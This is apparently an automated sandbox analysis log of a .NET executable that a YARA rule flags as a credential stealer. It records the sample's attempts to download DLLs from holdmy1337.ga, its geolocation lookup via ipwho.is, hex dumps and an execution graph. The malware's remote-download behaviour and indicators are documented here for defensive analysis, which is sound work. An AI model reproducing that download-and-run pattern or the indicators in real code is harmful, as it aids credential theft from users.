              Jul 13, 2022 06:20:48.894200087 CEST49765443192.168.2.5136.243.172.101
              Jul 13, 2022 06:20:48.900077105 CEST49765443192.168.2.5136.243.172.101
              TimestampSource PortDest PortSource IPDest IP
              Jul 13, 2022 06:20:45.330967903 CEST5966153192.168.2.58.8.8.8
              Jul 13, 2022 06:20:45.649893999 CEST53596618.8.8.8192.168.2.5
              Jul 13, 2022 06:20:48.741257906 CEST5375753192.168.2.58.8.8.8
              Jul 13, 2022 06:20:48.771157980 CEST53537578.8.8.8192.168.2.5
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Jul 13, 2022 06:20:45.330967903 CEST192.168.2.58.8.8.80x6141Standard query (0)holdmy1337.gaA (IP address)IN (0x0001)
              Jul 13, 2022 06:20:48.741257906 CEST192.168.2.58.8.8.80x56c3Standard query (0)ipwho.isA (IP address)IN (0x0001)
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Jul 13, 2022 06:20:45.649893999 CEST8.8.8.8192.168.2.50x6141No error (0)holdmy1337.ga188.114.96.3A (IP address)IN (0x0001)
              Jul 13, 2022 06:20:45.649893999 CEST8.8.8.8192.168.2.50x6141No error (0)holdmy1337.ga188.114.97.3A (IP address)IN (0x0001)
              Jul 13, 2022 06:20:48.771157980 CEST8.8.8.8192.168.2.50x56c3No error (0)ipwho.is136.243.172.101A (IP address)IN (0x0001)
              • holdmy1337.ga
              • ipwho.is
              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.549751188.114.96.3443C:\Users\user\Desktop\dBvNa2pTbj.exe
              TimestampkBytes transferredDirectionData
              2022-07-13 04:20:46 UTC0OUTGET /assets/dll/Ionic.Zip.dll HTTP/1.1
              Host: holdmy1337.ga
              Connection: Keep-Alive
              2022-07-13 04:20:46 UTC0INHTTP/1.1 403 Forbidden
              Date: Wed, 13 Jul 2022 04:20:46 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RdnGRD1Gff6EJxZ%2FPmVbfBF6u8DRG7hKTNicZi%2F75lP2psYXR5XLNdBOePYko22idIS5qCzOdIWIWdcKbfBv%2BFBWKEtS9UU5340WpkZEn1XFv76N%2Fn4Eushv9YTp4oC3"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 729f3a5cab789c00-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              2022-07-13 04:20:46 UTC0INData Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20
              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
              2022-07-13 04:20:46 UTC1INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.549752188.114.96.3443C:\Users\user\Desktop\dBvNa2pTbj.exe
              TimestampkBytes transferredDirectionData
              2022-07-13 04:20:46 UTC1OUTGET /assets/dll/EntityFramework.dll HTTP/1.1
              Host: holdmy1337.ga
              2022-07-13 04:20:46 UTC1INHTTP/1.1 403 Forbidden
              Date: Wed, 13 Jul 2022 04:20:46 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MNmrc2sZmN8znbOriV2fmJZxcHLxd0d9wWLSWd6krtqlpwCn9Yl1q0WrvPWjAs%2FWXYgixGG%2FbIht7Y0c%2BCnVd1f5p82wmV71zW%2FFcz5f%2BRs1zEAjPTwFrzz%2BRqog63KB"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 729f3a5dfd1369a3-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              2022-07-13 04:20:46 UTC1INData Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20
              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
              2022-07-13 04:20:46 UTC2INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.549753188.114.96.3443C:\Users\user\Desktop\dBvNa2pTbj.exe
              TimestampkBytes transferredDirectionData
              2022-07-13 04:20:46 UTC2OUTGET /assets/dll/EntityFramework.SqlServer.dll HTTP/1.1
              Host: holdmy1337.ga
              2022-07-13 04:20:46 UTC2INHTTP/1.1 403 Forbidden
              Date: Wed, 13 Jul 2022 04:20:46 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LjXQl57cA4%2F6dF4cETbFWY%2F4dNp2yBM562bgDdk%2FBMq4e5P6Y0k4bEbJ%2F%2FJNnVV5iPZhfbIJ%2B8mpqCFdpUSxlAff80E9d7D24Bk18UtC8LBnBrpbUl3hwwY3fPa45%2BUM"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 729f3a5f0e8d8fdd-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              2022-07-13 04:20:46 UTC2INData Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20
              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
              2022-07-13 04:20:46 UTC3INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.549754188.114.96.3443C:\Users\user\Desktop\dBvNa2pTbj.exe
              TimestampkBytes transferredDirectionData
              2022-07-13 04:20:46 UTC3OUTGET /assets/dll/System.Data.SQLite.dll HTTP/1.1
              Host: holdmy1337.ga
              2022-07-13 04:20:46 UTC3INHTTP/1.1 403 Forbidden
              Date: Wed, 13 Jul 2022 04:20:46 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G74D7K65x6MO7hvmX52vMqg7Yoo2eBcD6VtJEYqHN8cyznApMIp8nDFW3zU6Ko6z437bl5g06fuO94vI7K5EF%2FIEXZ%2FGDJwMO3kvqBMWogMpuMT98JfGHJYPyywCeJD1"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 729f3a6018e59b8f-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              2022-07-13 04:20:46 UTC3INData Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20
              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
              2022-07-13 04:20:46 UTC4INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.549756188.114.96.3443C:\Users\user\Desktop\dBvNa2pTbj.exe
              TimestampkBytes transferredDirectionData
              2022-07-13 04:20:46 UTC4OUTGET /assets/dll/System.Data.SQLite.EF6.dll HTTP/1.1
              Host: holdmy1337.ga
              2022-07-13 04:20:46 UTC4INHTTP/1.1 403 Forbidden
              Date: Wed, 13 Jul 2022 04:20:46 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kZ%2FYZnv%2F58ow6idhGhK3hGeCvZAVvdl%2FMDDH9lIvFHgfEDqRiSQ%2FNWhMUPG7Elo2IsCMbL5BzlZdIHfG0UrQYItlD1K%2B4qQNJrSbONF0ngME74nhonPsPICAToz1K3b5"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 729f3a60edb8909c-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              2022-07-13 04:20:46 UTC4INData Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20
              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
              2022-07-13 04:20:46 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              5192.168.2.549757188.114.96.3443C:\Users\user\Desktop\dBvNa2pTbj.exe
              TimestampkBytes transferredDirectionData
              2022-07-13 04:20:47 UTC5OUTGET /assets/dll/System.Data.SQLite.Linq.dll HTTP/1.1
              Host: holdmy1337.ga
              2022-07-13 04:20:47 UTC5INHTTP/1.1 403 Forbidden
              Date: Wed, 13 Jul 2022 04:20:47 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MIEjGYMh7ZMbaY6M7TJZ%2F5nlqZnNO4FhK5yZ8cPuAjfWwmMM7ylvcevS5bHLmh06iFqdDI%2Brt0y5WIGj2r0CKLSHXC7QAyCX9rIRoueqF49mMxryRVxvRUT176AAAFxw"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 729f3a620bf6bb8f-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              2022-07-13 04:20:47 UTC6INData Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20
              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
              2022-07-13 04:20:47 UTC6INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              6192.168.2.549758188.114.96.3443C:\Users\user\Desktop\dBvNa2pTbj.exe
              TimestampkBytes transferredDirectionData
              2022-07-13 04:20:47 UTC6OUTGET /assets/dll/x86/SQLite.Interop.dll HTTP/1.1
              Host: holdmy1337.ga
              2022-07-13 04:20:47 UTC6INHTTP/1.1 403 Forbidden
              Date: Wed, 13 Jul 2022 04:20:47 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z0PB9Cx3FfEPpYDL1D8eOtKTi0Ma5yQeA6UsjNwo6q7RKvW4z1TVkob37uL0WfFVdnv8gsYY5TL69HY0OBj2ICSMmcZNSIwpTM6wBXYYBsGv6WeFWLtAQFKRgMyb8BB1"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 729f3a635b209bf4-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              2022-07-13 04:20:47 UTC7INData Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20
              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
              2022-07-13 04:20:47 UTC7INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              7192.168.2.549759188.114.96.3443C:\Users\user\Desktop\dBvNa2pTbj.exe
              TimestampkBytes transferredDirectionData
              2022-07-13 04:20:47 UTC7OUTGET /assets/dll/x64/SQLite.Interop.dll HTTP/1.1
              Host: holdmy1337.ga
              2022-07-13 04:20:47 UTC7INHTTP/1.1 403 Forbidden
              Date: Wed, 13 Jul 2022 04:20:47 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A9gMCjWMzZvPKB7qd5b5rmk38GSs4%2FVK75C44pp0rZLAsia2bLN9QXNvmp6LlGKIBxDTcqqzcj9i%2BaF6n9lMZJiQ2BKRaPuuoW46ER4GZOrQ6w2klPhSBK0gTIvB7sfg"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 729f3a647a896910-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              2022-07-13 04:20:47 UTC8INData Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20
              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
              2022-07-13 04:20:47 UTC8INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              8192.168.2.549765136.243.172.101443C:\Users\user\Desktop\dBvNa2pTbj.exe
              TimestampkBytes transferredDirectionData
              2022-07-13 04:20:48 UTC8OUTGET /?output=xml HTTP/1.1
              Host: ipwho.is
              Connection: Keep-Alive
              2022-07-13 04:20:48 UTC8INHTTP/1.1 200 OK
              Date: Wed, 13 Jul 2022 04:20:48 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              Server: ipwhois
              X-Powered-By: python
              Access-Control-Allow-Origin: *
              Access-Control-Allow-Headers: *
              X-Robots-Tag: noindex
              2022-07-13 04:20:48 UTC8INData Raw: 33 39 31 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 34 2e 31 37 2e 35 32 2e 31 34 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 45 75 72 6f 70 65 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 45 55 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 53 77 69 74 7a 65 72 6c 61 6e 64 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 43 48 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 5a 75 72 69 63 68 3c 2f 72 65 67 69 6f 6e
              Data Ascii: 391<?xml version="1.0" encoding="UTF-8"?><query><ip>84.17.52.14</ip><success>1</success><type>IPv4</type><continent>Europe</continent><continent_code>EU</continent_code><country>Switzerland</country><country_code>CH</country_code><region>Zurich</region


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Target ID:0
              Start time:06:20:43
              Start date:13/07/2022
              Path:C:\Users\user\Desktop\dBvNa2pTbj.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\dBvNa2pTbj.exe"
              Imagebase:0xae0000
              File size:429568 bytes
              MD5 hash:628E04A5C298A35BD396B74A42D237FE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low

              Reset < >

                Execution Graph

                Execution Coverage:9.2%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:53
                Total number of Limit Nodes:0
                execution_graph 20310 b39bfc8 20311 b39bfe6 20310->20311 20314 b39b14c 20311->20314 20313 b39c01d 20316 b39dae8 LoadLibraryA 20314->20316 20317 b39dbc4 20316->20317 20318 1534ba0 20319 1534ba5 20318->20319 20327 1534bfc 20319->20327 20329 1537463 20319->20329 20332 153743c 20319->20332 20336 153742f 20319->20336 20340 15373a8 20319->20340 20344 1537449 20319->20344 20348 1537415 20319->20348 20352 1537456 20319->20352 20356 1537422 20319->20356 20330 1537468 KiUserExceptionDispatcher 20329->20330 20331 1537475 20330->20331 20331->20327 20333 1537441 20332->20333 20334 1537468 KiUserExceptionDispatcher 20333->20334 20335 1537475 20334->20335 20335->20327 20337 1537434 20336->20337 20338 1537468 KiUserExceptionDispatcher 20337->20338 20339 1537475 20338->20339 20339->20327 20343 15373ad 20340->20343 20341 1537468 KiUserExceptionDispatcher 20342 1537475 20341->20342 20342->20327 20343->20341 20345 153744e 20344->20345 20346 1537468 KiUserExceptionDispatcher 20345->20346 20347 1537475 20346->20347 20347->20327 20349 153741a 20348->20349 20350 1537468 KiUserExceptionDispatcher 20349->20350 20351 1537475 20350->20351 20351->20327 20353 153745b 20352->20353 20354 1537468 KiUserExceptionDispatcher 20353->20354 20355 1537475 20354->20355 20355->20327 20357 1537427 20356->20357 20358 1537468 KiUserExceptionDispatcher 20357->20358 20359 1537475 20358->20359 20359->20327 20360 1530448 20361 1530468 20360->20361 20364 1530fa6 20360->20364 20368 1530e54 20360->20368 20365 1530f84 20364->20365 20365->20361 20366 1531880 VirtualProtect 20365->20366 20367 15318ba 20366->20367 20367->20361 20370 1530ef6 20368->20370 20369 1531880 VirtualProtect 20371 15318ba 20369->20371 20370->20361 20370->20369 20371->20361 20372 15395a8 20373 15395ee KiUserCallbackDispatcher 20372->20373 20375 1539641 20373->20375
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: "F$"F$1kKR$1kKR$1kKR$:L|$L:*S$L:*S$L:*S$P4s$P4s$T}A$T}A$cEVT$k8w[$qrA&$sVYZ$sVYZ$Q<
                • API String ID: 0-3309473870
